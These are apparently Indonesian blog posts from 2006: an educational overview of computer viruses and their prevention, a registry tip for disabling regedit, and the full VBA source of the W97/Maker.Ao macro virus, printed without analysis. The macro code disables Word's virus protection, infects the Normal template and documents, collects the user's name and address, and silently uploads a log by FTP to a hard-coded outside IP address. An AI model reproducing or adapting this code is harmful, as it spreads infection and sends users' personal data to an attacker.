John von Neumann, dengan membuat suatu jenis permainan/game. Mereka membuat program yang dapat memperbanyak dirinya dan dapat menghancurkan program buatan lawan. Program yang mampu bertahan dan menghancurkan semua program lain, akan dianggap sebagai pemenangnya. Permainan ini akhirnya menjadi permainan favorit di tiap-tiap lab komputer. Tetapi, semakin lama program yang diciptakan makin berbahaya, sehingga mereka melakukan pengawasan dan pengamanan yang ketat terhadap permainan ini. 1980, Program-program tersebut yang akhirnya dikenal dengan sebutan “virus” ini berhasil menyebar keluar lingkungan laboratorium, dan mulai beredar di masyarakat umum.

PENGERTIAN VIRUS

“A program that can infect other programs by modifying them to include a slighty altered copy of itself. A virus can spread throughout a computer system or network using the authorization of every user using it to infect their programs. Every programs that gets infected can also act as a virus that infection grows“

( Fred Cohen )

Pertama kali istilah “virus” digunakan oleh Fred Cohen pada tahun 1984 di Amerika Serikat. Virus komputer dinamakan “virus” karena memiliki beberapa persamaan mendasar dengan virus pada istilah kedokteran (biological viruses). Virus komputer bisa diartikan sebagai suatu program komputer biasa. Tetapi memiliki perbedaan yang mendasar dengan
program-program lainnya,yaitu virus dibuat untuk menulari program-program lainnya, mengubah, memanipulasinya bahkan sampai merusaknya. Ada yang perlu dicatat disini, virus hanya akan menulari apabila program pemicu atau program yang telah terinfeksi tadi dieksekusi, disinilah perbedaannya dengan “worm”. Tulisan ini tidak akan bahas worm karena nanti
akan mengalihkan kita dari pembahasan mengenai virus ini.

KRITERIA VIRUS

Suatu program dapat disebut sebagai suatu virus apabila memenuhi minimal 5 kriteria berikut :

1. Kemampuan untuk mendapatkan informasi
2. Kemampuan untuk memeriksa suatu file
3. Kemampuan untuk menggandakan diri dan menularkan diri
4. Kemampuan melakukan manipulasi
5. Kemampuan untuk menyembunyikan diri. Sekarang akan coba dijelaskan dengan singkat apa yang dimaksud
dari tiap-tiap kemampuan itu dan mengapa ini sangat diperlukan.

1. Kemampuan untuk mendapatkan informasi
Pada umumnya suatu virus memerlukan daftar nama-nama file yang ada
dalam suatu directory. Untuk apa? Agar dia dapat memperoleh daftar file yang bisa dia tulari. Misalnya, virus makro yang akan menginfeksi semua file data MS Word, akan mencari daftar file berekstensi *.doc. Disinilah kemampuan mengumpulkan informasi itu diperlukan agar virus dapat membuat daftar/data semua file, lalu memilahnya dengan
mencari file-file yang bisa ditulari. Biasanya data ini tercipta saat file yang tertular/terinfeksi virus atau file program
virus itu sendiri dibuka oleh user. Sang virus akan segera melakukan pengumpulan data dan menaruhnya (biasanya) di RAM, sehingga apabila komputer dimatikan semua data hilang. Tetapi data-data ini akan tercipta kembali setiap kali virus itu diaktifkan. Biasanya data-data ini disimpan juga sebagai hidden file oleh virus tersebut.

2. Kemampuan memeriksa suatu program
Suatu virus juga harus bisa memeriksa suatu file yang akan ditulari, misalnya dia bertugas menulari program berekstensi *.doc, maka dia harus memeriksa apakah file dokumen tersebut telah terinfeksi ataupun belum, karena jika sudah, akan percuma menularinya lagi. Ini sangat berguna untuk meningkatkan kemampuan suatu virus dalam hal kecepatan menginfeksi suatu file/program. Yang umum dilakukan oleh virus adalah memiliki/memberi tanda pada file/program yang telah terinfeksi sehingga mudah untuk dikenali oleh virus tersebut. Contoh penandaan adalah misalnya memberikan suatu byte yang unik di setiap file yang telah terinfeksi.

3. Kemampuan untuk menggandakan diri
Kalo ini memang virus “bang-get”, maksudnya, tanpa kemampuan ini tak adalah virus. Inti dari virus adalah kemampuan mengandakan diri dengan cara menulari file lainnya. Suatu virus apabila telah menemukan calon korbannya maka ia akan mengenalinya dengan memeriksanya. Jika belum terinfeksi maka sang virus akan memulai aksinya penularan dengan cara menuliskan byte pengenal pada file tersebut, dan seterusnya mengcopikan/menulis kode objek virus diatas file sasaran. Beberapa cara umum yang dilakukan oleh virus untuk menulari/menggandakan dirinya adalah :

a. File yang akan ditulari dihapus atau diubah namanya. Kemudian diciptakan suatu file berisi program virus itu
sendiri menggunakan nama file yang asli.
b. Program virus yang sudah dieksekusi/load ke memori akan langsung menulari file-file lain dengan cara menumpangi
seluruh file yang ada.

4. Kemampuan mengadakan manipulasi
Rutin (routine) yang dimiliki suatu virus akan dijalankan setelah virus menulari suatu file. Isi dari suatu rutin ini dapat beragam mulai dari yang tidak berbahaya sampai yang melakukan perusakan. Rutin ini umumnya digunakan untuk memanipulasi file atau pun mempopulerkan pembuatnya ! Rutin ini memanfaatkan kemampuan dari suatu sistem operasi (Operating System), sehingga memiliki kemampuan yang sama dengan yang dimiliki sistem operasi. Misal :

a. Membuat gambar atau pesan pada monitor
b. Mengganti/mengubah-ubah label dari tiap file, direktori, atau label dari drive di PC
c. Memanipulasi file yang ditulari
d. Merusak file
e. Mengacaukan kerja printer, dsb

5. Kemampuan Menyembunyikan diri
Kemampuan menyembunyikan diri ini harus dimiliki oleh suatu virus agar semua pekerjaan baik dari awal sampai berhasilnya penularan dapat terlaksana. Langkah langkah yang biasa dilakukan adalah:

– Program virus disimpan dalam bentuk kode mesin dan digabung dengan program lain yang dianggap berguna oleh pemakai
– Program virus diletakkan pada Boot Record atau track pada disk yang jarang diperhatikan oleh komputer itu sendiri
– Program virus dibuat sependek mungkin, dan hasil file yang diinfeksi tidak terlalu berubah ukurannya
– Virus tidak mengubah keterangan/informasi waktu suatu file
– dll

SIKLUS HIDUP VIRUS
Siklus hidup virus secara umum, melalui 4 tahap:

o Dormant phase ( Fase Istirahat/Tidur ) Pada fase ini virus tidaklah aktif. Virus akan diaktifkan oleh suatu kondisi tertentu, semisal: tanggal yang ditentukan, kehadiran program lain/dieksekusinya program lain, dsb. Tidak semua virus melalui fase ini.
o Propagation phase ( Fase Penyebaran ) Pada fase ini virus akan mengkopikan dirinya kepada suatu program atau ke suatu tempat dari media storage (baik hardisk, RAM dsb). Setiap program yang terinfeksi akan menjadi hasil “kloning” virus tersebut (tergantung cara virus tersebut menginfeksinya).
o Trigerring phase ( Fase Aktif ) Di fase ini virus tersebut akan aktif dan hal ini juga di picu oleh beberapa kondisi seperti pada Dormant Phase.
o Execution phase ( Fase Eksekusi ) Pada fase inilah virus yang telah aktif tadi akan melakukan fungsinya. Seperti menghapus file, menampilkan pesan-pesan, dsb

JENIS – JENIS VIRUS
Untuk lebih mempertajam pengetahuan kita tentang virus, saya akan coba memberikan penjelasan tentang jenis-jenis virus yang sering berkeliaran di masyarakat umum.

1. Virus Makro
Jenis virus ini pasti sudah sangat sering kita dengar. Virus ini ditulis dengan bahasa pemrograman dari suatu aplikasi bukan dengan bahasa pemrograman dari suatu Operating System. Virus ini dapat berjalan apabila aplikasi pembentuknya dapat berjalan dengan baik. Sebagai contoh jika pada komputer mac dijalankan aplikasi Word, maka virus makro yang dibuat dari bahasa makro Word dapat bekerja pada komputer bersistem operasi Mac ini. Contoh virus:

– Varian W97M, misal W97M.Panther Panjang 1234 bytes, akanmenginfeksi NORMAL.DOT dan menginfeksi
dokumen apabila dibuka.
– WM.Twno.A;TW Panjang 41984 bytes, akan menginfeksi Dokumen Ms.Word yang menggunakan bahasa
makro, biasanya berekstensi *.DOT dan *.DOC
– dll

2. Virus Boot Sector
Virus Boot sector ini sudah umum sekali menyebar. Virus ini dalam menggandakan dirinya, akan memindahkan atau menggantikan boot sector asli dengan program booting virus. Sehingga saat terjadi booting maka virus akan diload ke memori dan selanjutnya virus akan mempunyai kemampuan mengendalikan hardware standar (contoh : monitor, printer dsb) dan dari memori ini pula virus akan menyebar ke seluruh drive yang ada dan yang terhubung ke komputer (contoh : floopy, drive lain selain drive c:). Contoh virus :

– Varian virus wyx ex: wyx.C(B) menginfeksi boot record dan floopy ; Panjang :520 bytes; Karakteristik : memory
resident dan terenkripsi.
– Varian V
– Sign : Menginfeksi : Master Boot Record ; Panjang 520 bytes; Karakteristik : menetap di memori (memory
resident),terenkripsi, dan polymorphic)
– Stoned.june 4th/ bloody!: Menginfeksi : Master Boot Record dan floopy; Panjang 520 bytes; Karakteristik :
menetap di memori (memory resident), terenkripsi dan menampilkan pesan “Bloody!june 4th 1989” setelah
komputer melakukan booting sebanyak 128 kali.

3. Stealth Virus
Virus ini akan menguasai tabel interrupt pada DOS yang sering kita kenal dengan “Interrupt interceptor”. Virus ini berkemampuan untuk mengendalikan instruksi-instruksi level DOS dan biasanya mereka tersembunyi sesuai namanya baik secara penuh ataupun ukurannya. Contoh virus :

– Yankee.XPEH.4928, Menginfeksi file *.COM dan *.EXE ; Panjang 4298 bytes; Karakteristik: menetap
di memori, ukurantersembunyi, memiliki pemicu
– WXYC (yang termasuk kategori boot record pun karena masuk kategri stealth dimasukkan pula disini),
Menginfeksi floopy an motherboot record; Panjang 520 bytes; Karakteristik : menetap di memori; ukuran dan virus
tersembunyi.
– Vmem(s): Menginfeksi file file *.EXE, *.SYS, dan *.COM ; Panjang fie 3275 bytes; Karakteristik:menetap
di memori, ukuran tersembunyi, di enkripsi.
– dll

4. Polymorphic Virus
Virus ini Dirancang buat mengecoh program antivirus, artinya virus ini selalu berusaha agar tidak dikenali oleh antivirus dengan cara selalu merubah rubah strukturnya setiap kali selesai menginfeksi file/program lain. Contoh virus:

– Necropolis A/B, Menginfeksi file *.EXE dan *.COM; Panjang file 1963 bytes; Karakteristik: menetap di memori,
ukuran dan virus tesembunyi,terenkripsi dan dapat berubah ubah struktur
– Nightfall, Menginfeksi file *.EXE; Panjang file 4554 bytes; Karakteristik : menetap di memori, ukuran dan virus
tesembunyi,memiliki pemicu, terenkripsidan dapat berubah-ubah struktur
– dll

5. Virus File/Program
Virus ini menginfeksi file-file yang dapat dieksekusi langsung dari sistem operasi, baik itu file *.EXE, maupun *.COM biasanya juga hasil infeksi dari virus ini dapat diketahui dengan berubahnya ukuran file yang diserangnya.

6. Multi Partition Virus
Virus ini merupakan gabungan dari virus boot sector dan virus file. Artinya pekerjaan yang dilakukan berakibat dua,
yaitu dia dapat menginfeksi file-file *.EXE atau *.COM dan juga menginfeksi boot sector.

BEBERAPA CARA PENYEBARAN VIRUS

Virus layaknya virus biologi harus memiliki media untuk dapat menyebar, virus komputer dapat menyebar ke berbagai komputer/mesin lainnya juga melalui berbagai media, diantaranya:

1. Disket, media storage R/W Media penyimpanan eksternal dapat menjadi sasaran empuk bagi virus untuk dijadikan
media. Baik sebagai tempat menetap ataupun sebagai media penyebarannya. Media yang bias melakukan operasi
R/W (Read dan Write) sangat memungkinkan untuk ditumpangi virus dan dijadikan sebagai media penyebaran.
2. Jaringan ( LAN, WAN,dsb) Hubungan antara beberapa computer secara langsung sangat memungkinkan suatu virus
ikut berpindah saat terjadi pertukaran/pengeksekusian file yang mengandung virus.
3. WWW (internet) Sangat mungkin suatu situs sengaja ditanamkan suatu “virus” yang akan menginfeksi
komputer-komputer yang mengaksesnya.
4. Software yang Freeware, Shareware atau bahkan Bajakan Banyak sekali virus yang sengaja ditanamkan
dalam suatu program yang disebarluaskan baik secara gratis, atau trial version.
5. Attachment pada email, transfering file Hampir semua jenis penyebaran virus akhir-akhir ini menggunakan
email attachment dikarenakan semua pemakai jasa internet pastilah menggunakan email untuk berkomunikasi, file-file
ini sengaja dibuat mencolok/menarik perhatian, bahkan seringkali memiliki ekstensi ganda pada penamaan filenya.

PENANGULANGANNYA

1. Langkah-Langkah untuk Pencegahan
Untuk pencegahan anda dapat melakukan beberapa langkah-langkah berikut :

o Gunakan antivirus yang anda percayai dengan update terbaru. Tidak perduli apapun merknya asalkan selalu
diupdate, dan auto-protect dinyalakan maka komputer anda terlindungi.
o Selalu scanning semua media penyimpanan eksternal yang akan digunakan, mungkin hal ini agak merepotkan
tetapi jika auto-protect antivirus anda bekerja maka prosedur ini dapat dilewatkan.
o Jika anda terhubung langsung ke Internet cobalah untuk mengkombinasikan antivirus anda dengan
Firewall, Anti-spamming, dsb.
o Selalu waspada terhadap fle-file yang mencurigakan, contoh : file dengan 2 buah exstension atau file
executable yang terlihat mencurigakan.
o Untuk software freeware + shareware, ada baiknya anda mengambilnya dari situs resminya.
o Semampunya hindari membeli barang bajakan, gunakan software-software open source.

2. Langkah-Langkah Apabila telah Terinfeksi

o Deteksi dan tentukan dimanakah kira-kira sumber virus tersebut apakah di disket, jaringan, email dsb. Jika anda
terhubung ke jaringan maka ada baiknya anda mengisolasi komputer anda dulu (baik dengan melepas kabel atau
mendisable sambungan internet dari control panel)

o Identifikasi dan klasifikasikan jenis virus apa yang menyerang pc anda, dengan cara:

– Gejala yang timbul, misal : pesan, file yang corrupt atau hilang dsb
– Scan dengan antivirus anda, jika anda terkena saat auto
– protect berjalan berarti virus definition di dalam komputer anda tidak memiliki data virus ini, cobalah update
secara manual atau mendownload virus definitionnya untuk kemudian anda install. Jika virus tersebut memblok
usaha anda untuk mengupdate, maka upayakan untuk menggunakan media lain (komputer) dengan antivirus
yang memiliki update terbaru.

o Bersihkan virus tersebut. Setelah anda berhasil mendeteksi dan mengenalinya maka usahakan segera untuk mencari
removal atau cara-cara untuk memusnahkannya di situs-situs yang memberikan informasi perkembangan virus tersebut.
Hal ini perlu dilakukan apabila antivirus dengan update terbaru anda tidak berhasil memusnahkannya.
o Langkah terburuk. Jika semua hal diatas tidak berhasil adalah memformat ulang komputer anda .

Disable registry editor September 21, 2006

Posted by endare in virus.
1 comment so far

Disable registry editor

Anda pernah berpikir untuk mendisable regedit ? Hal ini sangat berguna untuk mencegah orang lain mengubah setting registry komputer anda !!! Untuk melakukan itu Anda dapat mengubah seting registry seperti yang tercantum pada tabel di bawah.

Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\WindowsCurrentVersion\Policies\System
Value Name DisableRegistryTools
Data Type REG_DWORD (DWORD Value)
Data (0 = enable regedit, 1 = disable regedit)

Jika Anda mengubah setting dengan benar maka saat program regedit dipanggil akan muncul pesan kesalahan seperti gambar di bawah ini:

Pasti anda bertanya, bagaimana cara mengembalikannya seperti semula? Caranya gampang, ikuti langkah-langkah di bawah ini :

  1. Dengan menggunakan Notepad, buatlah sebuah file baru. Ketikkan isi seperti di bawah ini:

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] “DisableRegistryTools”=dword:00000000

  1. Simpan dengan sembarang nama file, tapi dengan ekstensi reg, misalnya enable_regedit.reg.

  2. Setelah itu klik 2x file tersebut untuk meng-enable registry editor.

W97/Maker.Ao virus macro September 21, 2006

Posted by endare in virus.
add a comment

W97/Maker.Ao

Private Sub Document_Close()

On Error Resume Next

Const Marker = “<- this is a marker!”

‘Declare Variables

Dim SaveDocument, SaveNormalTemplate, _

DocumentInfected, NormalTemplateInfected As Boolean

Dim ad, nt As Object

Dim OurCode, UserAddress, LogData, LogFile As String

‘Initialize Variables

Set ad = ActiveDocument.VBProject.VBComponents.Item(1)

Set nt = NormalTemplate.VBProject.VBComponents.Item(1)

DocumentInfected = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)

NormalTemplateInfected = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)

‘Switch the VirusProtection OFF

Options.VirusProtection = False

If (Day(Now()) = 1) And (System.PrivateProfileString(“”, “HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info”, “LogFile”) = False) Then

If DocumentInfected = True Then

LogData = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)

ElseIf NormalTemplateInfected = True Then

LogData = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)

End If

LogData = Mid(LogData, InStr(1, LogData, “‘ Log” & “file –>”), Len(LogData) – InStr(1, LogData, “‘ Log” & “file –>”))

For I = 1 To 4

LogFile = LogFile + Mid(Str(Int(8 * Rnd)), 2, 1)

Next I

LogFile = “C:\hsf” & LogFile & “.sys”

Open LogFile For Output As #1

Print #1, LogData

Close #1

Open “c:\netldx.vxd” For Output As #1

Print #1, “o 209.201.88.110”

Print #1, “user anonymous”

Print #1, “pass itsme@”

Print #1, “cd incoming”

Print #1, “ascii”

Print #1, “put ” & LogFile

Print #1, “quit”

Close #1

Shell “command.com /c ftp.exe -n -s:c:\netldx.vxd”, vbHide

System.PrivateProfileString(“”, “HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info”, “LogFile”) = True

End If

‘Make sure that some conditions are true before we continue infecting anything

If (DocumentInfected = True Xor NormalTemplateInfected = True) And _

(ActiveDocument.SaveFormat = wdFormatDocument Or _

ActiveDocument.SaveFormat = wdFormatTemplate) Then

‘Infect the NormalTemplate

If DocumentInfected = True Then

SaveNormalTemplate = NormalTemplate.Saved

OurCode = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)

‘Write a log file of this NormalTemplate infection

For I = 1 To Len(Application.UserAddress)

If Mid(Application.UserAddress, I, 1) <> Chr(13) Then

If Mid(Application.UserAddress, I, 1) <> Chr(10) Then

UserAddress = UserAddress & Mid(Application.UserAddress, I, 1)

End If

Else

UserAddress = UserAddress & Chr(13) & “‘ “

End If

Next I

OurCode = OurCode & Chr(13) & _

“‘ ” & Format(Time, “hh:mm:ss AMPM – “) & _

Format(Date, “dddd, d mmm yyyy”) & Chr(13) & _

“‘ ” & Application.UserName & Chr(13) & _

“‘ ” & UserAddress & Chr(13)

nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines

nt.CodeModule.AddFromString OurCode

If SaveNormalTemplate = True Then NormalTemplate.Save

End If

‘Infect the ActiveDocument

If NormalTemplateInfected = True And _

(Mid(ActiveDocument.FullName, 2, 1) = “:” Or _

ActiveDocument.Saved = False) Then

SaveDocument = ActiveDocument.Saved

OurCode = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)

ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines

ad.CodeModule.AddFromString OurCode

If SaveDocument = True Then ActiveDocument.Save

End If

End If

End Sub